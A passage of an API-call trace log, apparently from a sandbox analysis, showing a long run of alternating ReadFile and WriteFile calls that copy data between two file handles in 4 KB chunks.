lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.891] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.891] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.892] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.892] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.892] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.892] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.892] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.892] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.896] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.915] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.916] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.916] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.916] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.916] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.916] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.916] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.917] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.918] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.918] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.918] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.918] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.918] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.918] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.919] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.919] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.919] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.919] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.919] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.919] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.919] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.920] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.920] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.920] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.920] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.920] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.920] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.920] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.921] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.921] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.921] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.921] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.921] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.921] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.921] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.922] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.922] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.922] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.922] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.922] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.922] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.922] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.923] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.923] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.923] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.923] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.924] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.924] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.924] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.924] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.925] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.925] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.925] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.925] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.925] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.925] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.925] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.926] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.926] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.926] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.926] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.926] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.926] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.926] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.927] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.927] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.927] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.927] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.927] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.927] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.927] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.928] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.928] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.928] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.928] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.928] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.928] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.928] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.929] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.929] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.929] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.929] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.929] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.929] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.930] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, 